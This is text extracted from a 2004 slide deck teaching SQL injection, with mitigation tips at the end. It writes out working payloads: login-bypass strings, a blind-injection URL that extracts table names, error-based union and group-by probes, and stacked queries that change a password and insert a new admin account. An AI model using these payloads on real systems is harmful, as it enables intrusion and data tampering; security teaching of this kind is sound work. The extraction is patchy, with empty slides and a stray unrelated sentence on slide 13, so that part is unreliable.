Professional Documents
Culture Documents
Agenda
What is SQL Injection SQL Injection possibilities Technologies affected by SQL Injections Types of SQL Injections Techniques in SQL Injections How to use Blind SQL Injections How to use SQL Injections How to use Advanced SQL Injections How update data in the Database How to avoid SQL Injections Next generation of Hacking Tools for SQL Injections
2
Copyright Kenexa 2004
3
Copyright Kenexa 2004
Using SQL injections, attackers can: Add new data to the database Could be embarrassing to find yourself selling politically incorrect items on an eCommerce site Perform an INSERT in the injected SQL Modify data currently in the database Could be very costly to have an expensive item suddenly be deeply discounted Perform an UPDATE in the injected SQL Often can gain access to other users system capabilities by obtaining their password
4
Copyright Kenexa 2004
JSPASPXML XSL JavascriptVB MFC and other ODBC-based tools APIs3- and 4GL-based languages such as C, OCI, Pro*C, and COBOL Perl CGI scripts that access Oracle databases many more
5
Copyright Kenexa 2004
6
Copyright Kenexa 2004
Authorization bypass Using the SELECT command Using the INSERT command Using SQL server stored procedures
7
Copyright Kenexa 2004
9
Copyright Kenexa 2004
Step 6 - If no press release is returned, the ASCII value is greater than 109 but not greater than 116. So, the letter is between n (110) and t (116). http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 113
10
Copyright Kenexa 2004
11
Copyright Kenexa 2004
12
Copyright Kenexa 2004
Here is a sample basic HTML form with two inputs, login and password. <form method="post" action="http://testasp.acunetix.com/login.asp"> <input name="tfUName" type="text" id="tfUName"> <input name="tfUPass" type="password" id="tfUPass"> </form>
The easiest way for the login.asp to work is by building a database query that looks like this: SELECT id FROM logins WHERE username = '$username' AND password = '$password
13
Copyright Kenexa 2004
If the variables $username and $password are requested directly from the user's input, this can easily be compromised. Suppose that we gave "Joe" as a username and that the following string was provided as a password: anything' OR 'x'='x SELECT id FROM logins WHERE username = 'Joe' AND password = 'anything' OR 'x'='x' Make sure that your short term goals will help to achieve the Medium term goals and vice versa.
14
Copyright Kenexa 2004
As the inputs of the web application are not properly sanitised, the use of the single quotes has turned the WHERE SQL command into a two-component clause. The 'x'='x' part guarantees to be true regardless of what the first part contains. This will allow the attacker to bypass the login form without actually knowing a valid username / password combination! Depending on the actual SQL query, you may have to try some of these possibilities: ' or 1=1-or 1=1-or 1=1-' or 'a'='a " or "a"="a ') or ('a'='a
15
Copyright Kenexa 2004
16
Copyright Kenexa 2004
17
Copyright Kenexa 2004
(which produces the error) Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /process_login.asp, line 35
Eventually the attacker arrives at the following 'username': ' group by users.id, users.username, users.password, users.privs having 1=1 which produces no error, and is functionally equivalent to: select * from users where username = ''
It would be useful if he could determine the types of each column. This can be achieved using a 'type conversion' error message, like this: Username: ' union select sum(username) from users-18
Copyright Kenexa 2004
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo": http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'-To INSERT a new record into the database: http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')-We can now login as "neo2" with the password of "newpas5".
19
Copyright Kenexa 2004
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from: - Input from users - Parameters from URL - Values from cookie For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer. Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab. Delete stored procedures that you are not using like: master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
20
Copyright Kenexa 2004
Ethical Hacking Server side scripting Client side scripting Bluetooth Hacking Console Hacking
21
Copyright Kenexa 2004
SQID Sequel Injection Digger SQLBrute - SQL Injection Brute Force Tool N-Stalker Web Application Security Scanner 2006 Acunetix Web Vulnerable Scanner HP Web Inspect Wikto: Web Server Assessment Tool
22
Copyright Kenexa 2004
References
23
Copyright Kenexa 2004
24
Copyright Kenexa 2004
www.kenexa.com